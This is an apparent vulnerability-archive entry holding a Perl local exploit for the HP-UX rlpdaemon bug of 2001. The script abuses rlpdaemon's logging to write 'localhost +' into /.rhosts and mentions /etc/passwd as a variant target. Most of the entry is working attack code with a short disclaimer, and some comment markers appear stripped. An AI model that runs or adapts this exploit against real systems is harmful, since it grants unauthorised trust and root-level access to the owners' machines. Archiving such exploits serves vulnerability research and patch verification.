exploit for old rlpdaemon bug

2014-03-18T00:00:00
ID SECURITYVULNS:DOC:30368
Type securityvulns
Reporter Securityvulns
Modified 2014-03-18T00:00:00

Description

!/opt/perl5/bin/perl -w

HP-UX rlpdaemon local exploit

Bulletin HPSBUX0111-176 (November 2001)

For use only on machines where you have legitimate root.

This attempts to add junk (including "localhost +") to /.rhosts.

Obvious variants could include /etc/passwd.

use IO::Socket;

$PORT = 9000; # pick something not in use

$pid=fork; die("fork: $!") unless (defined($pid));

if (0 == $pid) { # child - server, exec rlpdaemon with chosen argv

$IPPROTO_TCP=6;
$SOCK_STREAM=1;
$AF_INET=2;
$PF_INET=2;

$sockaddr='S n a4 x8';  # packed socket data

$this=pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");
socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die ("socket: $!");
bind(S, $this) or die("bind: $!");
listen(S, 5) or die("listen: $!");
$addr=accept(NS, S);

# dup2 on 3 standard streams
open(STDIN, "+<&NS") or die("dup2: $!");
open(STDOUT, "+>&NS") or die("dup2: $!");
open(STDERR, "+>&NS") or die("dup2: $!");

exec {"/usr/sbin/rlpdaemon"}
      "\nlocalhost +\n",
  "-i", "-l", "-L", "/.rhosts";
# UNREACHED
exit(1);

}

sleep 5; # let server start before we connect to it

parent - connect to server with loggable action

$remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "localhost", PeerPort => $PORT ) or die "cannot connect to port $PORT at localhost";

RFC1179

printf($remote "%clp\n", 2); # rlpdaemon should log this close($remote); exit(0);